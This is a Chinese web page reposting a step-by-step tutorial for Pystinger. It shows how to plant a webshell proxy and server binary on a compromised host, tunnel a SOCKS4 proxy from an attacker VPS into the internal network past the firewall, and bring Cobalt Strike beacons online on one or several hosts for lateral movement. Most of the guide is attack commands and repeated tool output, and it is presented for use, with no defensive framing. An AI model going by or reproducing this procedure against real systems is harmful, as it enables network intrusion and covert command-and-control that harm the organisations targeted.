Pystinger – 使用Webshell绕过防火墙进行流量转发_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
专业百科: ISO百科 专利知识 商标知识 版权知识
热销知产: 实用专利Hot! 发明专利 软著申报Hot! 商标申请
热销企服: AAA认证Hot! ISO认证Hot! ICP许可证Hot! EDI许可证
网络服务: 网站建设 渗透测试Hot! 代码审计Hot! 软文营销Hot!
企业服务导航
当前位置:主页 > 黑客新闻 快速链接:政策解读 | 公司新闻 | 行业动态 | 常见问题 | 技术文章 | 资质百科 | 资质认证 | 电商运营 | 常用文档

信息中心Infomation Center

政策解读
公司新闻
行业动态
常见问题
技术文章
资质百科
资质认证
员工提升
深圳企服
香港企服
商标知产
专利知识
创业百科

Pystinger – 使用Webshell绕过防火墙进行流量转发

发布日期:2024-05-24 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370

Pystinger – 使用Webshell绕过防火墙进行流量转发

文章来源: Khan安全攻防实验室 pystinger通过webshell实现内网SOCK4代理,端口映射,可直接用于metasploit-framework,viper,cobalt strike上线。         主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。      假设不出网服务器域名为 http://example.com:8080 ,服务器内网IP地址为192.168.3.11 1 . SOCK4代理 proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端 不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连 vps执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 如下输出表示成功 root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:600002020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:600102020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 512002020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.012020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:600202020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:600002020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept 此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理 此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020   2 . cobalt strike单主机上线 proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端   不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连   stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 如下输出表示成功  root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:600002020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:600102020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 512002020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.012020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:600202020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:600002020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1 生成payload,上传到主机运行后即可上线   3 . cobalt strike多主机上线 proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe 192.168.3.11启动服务端   192.168.3.11可以改成0.0.0.0   stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 如下输出表示成功  root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:600002020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:600102020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:600202020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 512002020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.012020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:600202020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:600202020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:600002020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11(example.com的内网IP地址) 生成payload,上传到主机运行后即可上线 横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线   4 . 定制Header及proxy 如果webshell需要配置Cookie或者Authorization,可通过--header参数配置请求头   --header "Authorization: XXXXXX,Cookie: XXXXX" 如果webshell需要通过代理访问,可通过--proxy设置代理   --proxy "socks5:127.0.0.1:1081" stinger_serverstinger_client windows linux   proxy.jsp(x)/php/aspx php7.2 tomcat7.0 iis8.0   项目地址: https://github.com/FunnyWolf/pystinger/releases/tag/v1.6

Pystinger – 使用Webshell绕过防火墙进行流量转发

代写全部资料 成功率全网领先 不成功免费重报 一直到干到过 承诺保障 精品服务 限时秒杀中……